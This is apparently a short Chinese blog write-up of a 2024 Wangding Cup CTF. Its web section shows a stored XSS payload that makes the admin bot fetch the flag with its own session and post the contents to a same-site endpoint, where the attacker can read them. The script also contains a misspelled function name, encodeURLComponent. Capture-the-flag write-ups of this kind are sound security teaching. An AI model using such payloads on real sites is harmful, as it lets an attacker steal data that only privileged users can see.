2024网鼎杯青龙组

CTF
CTF
发布日期:   2024-10-30
更新日期:   2025-01-23
文章字数:   282
阅读时长:   1 分
阅读次数:  

misc

具体flag放入github中

https://github.com/k1t0111/Ctf-AWD/tree/k1t0111-wdflag2024-1

web

可以看到首先随便一个登陆页面进去,进到飞机管理清单后台。然后发现了两处功能点。

  • 首先写一个清单,作为飞机起飞列表
  • 提交清单

思路:

  1. 清单提交可以触发xss
  2. 使用前端xss 代码提交给boss然后在boss地方触发
1
2
3
4
5
6
7
8
9
10
11
<script>fetch('flag')
.then(response=>response.text())
.then(data=>{
  fetch('/content/a93770ea93dc1f6a2b9d917b62d29db4',{
  method:'POST',
  body:"content=abc"+encodeURLComponent(data),
  headers:{
   'Content-Type':'application/x-www-form-urlencoded'
  }
})	
}) </script>

主体大意就是,因为尝试了boss是无法出网的因此我们使用js,使用boss的cookie 去访问flag。
然后把内容放在data中。同时继续访问另外一个文件将data内容作为post参数传递进去。然后修改hash文件的内容。我们再去访问hash就可以直接访问到flag。

总结最主要还是因为不出网络,因此我们拿不到cookie,因此想到了js功能,让boss自己去访问flag带出flag

文章作者: K1T0
文章链接: https://k1t0111.github.io/2024/10/30/2024%E7%BD%91%E9%BC%8E%E6%9D%AF%E9%9D%92%E9%BE%99%E7%BB%84/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 K1T0 !
CTF
  目录